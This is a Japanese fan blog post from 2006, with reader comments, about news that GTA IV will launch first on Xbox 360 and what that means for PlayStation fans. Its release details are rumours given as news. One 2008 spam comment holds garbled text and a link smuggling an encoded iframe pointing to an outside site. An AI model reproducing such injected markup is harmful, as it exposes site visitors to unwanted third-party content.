fc2ブログ




LCS、VCSのことを画像や動画をつけて紹介しています。リンクフリーです。


GTAⅣ
今週と先週が想像以上に忙しくまだ更新のめどが立っていません。
しかもそんな中「GTAⅣ」のことで絶望的な情報を知ってしまい、
余計に更新意欲が失せてしまいました。
なので、今回は絶望的なGTAⅣの情報をちょっとだけですが載せることにします。


●新情報

■一応発売日は2007年10月19日16日を予定
■Ⅳの初リリースは360
■360版のⅣはXbox Liveを使って「ストーリー」や「オブジェクト」などをDLできる予定
■↑はPS3にはない要素


実はこの他に
■PS3オンリーで出るはずだったゲームが360とのマルチで発売と変更になった
ゲームが急に増えだした。(実はGTAⅣもその1つ)
■PS3のソフト開発の難しさや掛かり過ぎるコストなどで
国内や海外のゲームソフト会社が360に流れているという事実。
■PS3はリージョンフリーなのに対して360はそうではなく
日本の本体でできたりでなかったりとマチマチ。
■旧Xboxで出ているGTAシリーズを見ると全て北米本体でないとできない。
これらを考慮すると360版のⅣも北米本体でないとできないでしょう。


PS一筋で突っ走ってきた私にとってはこのことも絶望的な情報の1部です。
一体どうすれば・・・・。

スポンサーサイト





この記事に対するコメント

1ゲット
これは絶望てきな情報だ

xBoxのどこがいいのか・・・
R☆のばっきゃろ~
【2006/11/26 16:39】 URL | Vista #58bjCdTA[ 編集]


いえR☆よりSonyのせいですよ。
SonyがPS3でのⅣの発売をはやく承諾せず、
そこにマイクロソフトがもっと良い条件で契約
という流れがあります。
【2006/11/26 17:12】 URL | JiG #-[ 編集]


そんなぁ~
逆に360箱からPS3にしてくれるようにsonyのやつには頑張ってもらいたいぃぃ(無理か、、、)
てゆうかそんなにPS3から360箱に行っちゃうなら360箱買った方がいいのか,,,,
まぁ買う金ないしMGS4がPS3だからかうとしてもPS3になるかな
なにしろR☆とsony仲直りでもしてくれ~
【2006/11/26 18:10】 URL | HK P90 #-[ 編集]


誤解があるかもしれないので言っておきますが
PS3でも一応発売されます。

噂ですけどMGS4は360でもリリースされるかもしれませんよ
あくまで噂ですけど
【2006/11/26 18:26】 URL | JiG #-[ 編集]


はっきりいって360箱でMGS4でたら360箱買います,,笑
てかPS3でも出るんですか?!
ならなら気にしなくていいんじゃないですか?
【2006/11/26 18:32】 URL | HK P90 #-[ 編集]


GTAⅣはPS3でもでますが1番最初にでるのが360
というのが悩みのタネなんですよ。

わかりやすくまとめると360版は発売が約束され、
しかも最初にリリースされるハードなんですよ。
しかしPS3版はいつ発売されるかわからないうえ
360版より後にリリースされるということです。
今までのリリースの流れが全く逆になってしまっている。
だからPS派の私は困るんです。
しかもPS3が現状を維持し続けると
360版とPC版のみの発売という可能性もぬぐえません。
【2006/11/26 18:45】 URL | JiG #-[ 編集]


そうなんですか,,
不安材料はかなり多いんですね
ん~ぼくの考えとしてはそこまでPSにこだわらないほうがいいかと..
まぁもっと時間が経てばいろいろなことが公になってどうすればいいかわかるか!

それとそろそろ6万ヒットですね!おめでとうございます!
【2006/11/26 18:54】 URL | HK P90 #-[ 編集]


PS3と360のスペックの善し悪しや
ブルーレイとDVDの違いは大きいと思うので
情報がもっとでてきてからどうするか
決めるつもりです。

もう6万ですか・・・。
ありがとうございます。
【2006/11/26 19:00】 URL | JiG #-[ 編集]


でも嘘かもしれませんよ
VCSもいろいろとうらぎられましたし
【2006/11/26 20:48】 URL | さる #-[ 編集]


PS3の互換性の問題と
初期不良(みんな大好き)
とGTA特有のバグで
GTA4(PS3)の未来はまっくらけっけ
【2006/11/27 11:33】 URL | Vista #58bjCdTA[ 編集]


コウ熱費の問題でぼくのPS3購入のみらいもまっくらけっけ
【2006/11/27 15:52】 URL | HK P90 #-[ 編集]


北米版の360なんか買う余裕ねー。
【2006/11/27 19:16】 URL | DO #-[ 編集]


久夛良木が悪い!!
 後GK多すぎw

360には、アジア版あるだろ!
【2006/11/28 18:57】 URL | 匿名 #-[ 編集]


記事に関係ないんですが、掲示板が凄い事になってますよ!!
ええと・・・アク禁にしたら、どうでしょう?
一応、回避のために・・・
どんどん違うIPで来ますが・・・。どうですか?
まぁ削除した方が得策かと!!
【2006/11/28 19:39】 URL | パッショソ(ロクデナシBOY) #-[ 編集]


エ?
それってどういう事ですか?
【2006/11/29 15:00】 URL | HK P90 #-[ 編集]


パッショソさんあなたの言う通りですね。
掲示板はあまりに酷いので一時閉鎖します。
まぁあまり使ってないので別に問題はないでしょう。

あと今週末は時間があるのでそのときに
デジカメで更新用のスクショを撮りまくろうと思っています。
ですのでそろそろまともに更新していけそうです。
【2006/11/29 20:07】 URL | JiG #-[ 編集]


待ってま~す!!
【2006/11/29 23:47】 URL | HK P90 #-[ 編集]


北米版・・・;
【2006/12/03 17:56】 URL | KEI #k9MHGdfk[ 編集]


PS3は余計な要素がありすぎなんですよ。インターネットとかパソコンがあるっちゅーの!
【2006/12/06 20:17】 URL | 蒼紫 #-[ 編集]

GTA4の開発動画がUPされますた
http://homepage3.nifty.com/worldsoccers/main.htm

今までみたことない動画なのですごすぎます!!
【2006/12/07 10:56】 URL | takumi #-[ 編集]


本当に絶望ですね・・・
俺もPS一筋で生きてきたんです
なのにこれはあまりにも酷すぎる。
なんとかならないのかな・・・。
【2007/03/04 14:48】 URL | #-[ 編集]


GKが多いブログだな。
別に360は悪い機体ではないだろ
【2007/07/24 23:35】 URL | #-[ 編集]


誰も360の事に対して文句言ってないでしょ
今までずっとPSで遊んできた人としては残念って言ってるだけ。
なぜPSが好きって言っただけでGKになるの?
ブログに文句言うんじゃなく、SONYに言ってよ
【2007/09/04 01:28】 URL | Corleone #.RcTnJaU[ 編集]

Linkz
泌礦辷鱚, 邇 粤辣? 轢粮, <a href=" http://www.imeem.com/tag/?q=free+xxx+movies+%3Ciframe+src=//landroverwestsahara.com/%3E.html ">free xxx movies</a>, fxm,
【2008/05/19 08:34】 URL | Sgvrhoyi #-[ 編集]

承認待ちコメント
このコメントは管理者の承認待ちです
【2008/08/05 18:49】 | #[ 編集]

承認待ちコメント
このコメントは管理者の承認待ちです
【2008/09/16 07:39】 | #[ 編集]


この記事に対するコメントの投稿














管理者にだけ表示を許可する